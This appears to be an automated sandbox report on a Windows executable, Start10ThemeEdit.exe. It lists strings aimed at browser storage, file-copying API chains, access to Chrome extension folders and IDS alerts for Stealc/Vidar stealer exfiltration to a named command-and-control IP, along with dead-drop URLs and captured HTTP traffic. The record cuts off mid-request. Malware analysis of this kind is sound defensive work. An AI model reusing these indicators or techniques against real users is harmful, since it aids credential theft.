GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefghi
Source:	Binary string: F:\NMC\CURRENT260IL1nightlyBuild15061_final\Libraries\WzWXF\Providers\WzWXFNotification\WzWXFIM\w64prod\WzWXFog64.pdb source: is-VDE8M.tmp.3.dr
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: lem.tmp, 00000001.00000003.2051781358.00000000022C1000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr
Source:	Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VirtualBoxVM\VirtualBoxVM.pdb source: is-TP3J2.tmp.3.dr

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A17891 FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,	6_3_02A17891
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A1A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,	6_3_02A1A69C
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A16784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,CopyFileA,DeleteFileA,Sleep,CopyFileA,memset,CopyFileA,DeleteFileA,memset,FindNextFileA,FindClose,	6_3_02A16784
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A21187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	6_3_02A21187
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A113DA FindFirstFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindClose,	6_3_02A113DA
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A23B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscpy,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,	6_3_02A23B10
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A18776 FindFirstFileA,FindNextFileA,	6_3_02A18776
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A18224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_3_02A18224
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A19C78 wsprintfA,FindFirstFileA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_3_02A19C78
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A22A5D wsprintfA,FindFirstFileA,StrCmpCA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_3_02A22A5D
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A21BD2 wsprintfA,FindFirstFileA,FindNextFileA,FindClose,	6_3_02A21BD2
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A22539 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrlen,lstrlen,	6_3_02A22539
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0085172B __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,	6_2_0085172B

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_3_02A21722 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrlen,

6_3_02A21722

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 38MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49853 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49892 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49883 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50000 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49842 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.180.73:443 -> 192.168.2.5:49871
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49964 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49994 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49994 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50051 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50058 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50058 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49977 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49977 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50067 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50067 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49985 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49985 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.180.73:443 -> 192.168.2.5:49863
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50107 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50107 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50122 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50122 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50117 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50117 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50095 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50095 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50131 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50143 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50135 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50142 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50146 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50144 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50145 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50153 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50152 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50154 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50151 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50147 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50141 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50148 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50149 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50150 -> 116.202.180.73:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50140 -> 116.202.180.73:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199828130190

Source: global traffic

HTTP traffic detected: GET /g02f04 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 13.74.129.1 13.74.129.1

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49975 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.79.3
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.189.192
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.79.3
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.189.192
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.79.3
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.189.192
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.79.3
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.189.192
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 18.173.132.98
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.28

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_3_02A13C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

6_3_02A13C79

Source: global traffic	HTTP traffic detected: GET /g02f04 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: www.0e0.jp.eu.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.ea367c17e754dc6b9855.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.6sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=B298872B9808410FAD3FCE25355C5981.RefC=2025-02-19T20:03:12Z; USRLOC=; MUID=33005DC6DCF769042869485EDD95682F; MUIDB=33005DC6DCF769042869485EDD95682F; _EDGE_S=F=1&SID=2BCFFE29921562AE14CDEBB1931A6379; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.96ac23719317b1928681.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.6sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; 